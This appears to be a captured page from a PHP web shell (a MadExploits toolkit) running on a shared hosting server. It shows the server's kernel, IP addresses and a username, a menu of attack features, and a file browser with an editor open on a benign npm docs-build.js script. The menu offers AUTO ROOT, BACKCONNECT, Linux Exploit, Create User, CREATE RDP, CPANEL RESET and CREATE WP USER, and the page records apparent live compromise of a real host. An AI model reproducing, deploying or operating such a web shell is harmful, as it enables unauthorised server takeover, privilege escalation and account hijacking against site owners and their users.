Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.145.66.104
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.js
3
KB
-rw-r--r--
clean-old.sh
4.17
KB
-rw-r--r--
dep-update
294
B
-rw-r--r--
dev-dep-update
292
B
-rw-r--r--
docs-build.js
825
B
-rw-r--r--
gen-changelog
420
B
-rw-r--r--
gen-dev-ignores.js
350
B
-rw-r--r--
install.sh
5.47
KB
-rw-r--r--
maketest
1.8
KB
-rw-r--r--
pr
3.96
KB
-rw-r--r--
publish-tag.js
151
B
-rw-r--r--
release.sh
889
B
-rw-r--r--
relocate.sh
673
B
-rw-r--r--
update-authors.sh
197
B
-rw-r--r--
update-dist-tags.js
3.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docs-build.js
#!/usr/bin/env node var fs = require('fs') var marked = require('marked-man') var npm = require('../lib/npm.js') var args = process.argv.slice(2) var src = args[0] var dest = args[1] || src fs.readFile(src, 'utf8', function (err, data) { if (err) return console.log(err) function replacer (match, p1) { return 'npm help ' + p1.replace(/npm /, '') } var result = data.replace(/@VERSION@/g, npm.version) .replace(/^---([\s\S]+?)---/g, '') .replace(/\[([^\]]+)\]\(\/cli-commands\/([^)]+)\)/g, replacer) .replace(/\[([^\]]+)\]\(\/configuring-npm\/([^)]+)\)/g, replacer) .replace(/\[([^\]]+)\]\(\/using-npm\/([^)]+)\)/g, replacer) .replace(/(# .*)\s+(## (.*))/g, '$1 - $3') .trim() fs.writeFile(dest, marked(result), 'utf8', function (err) { if (err) return console.log(err) }) })
Close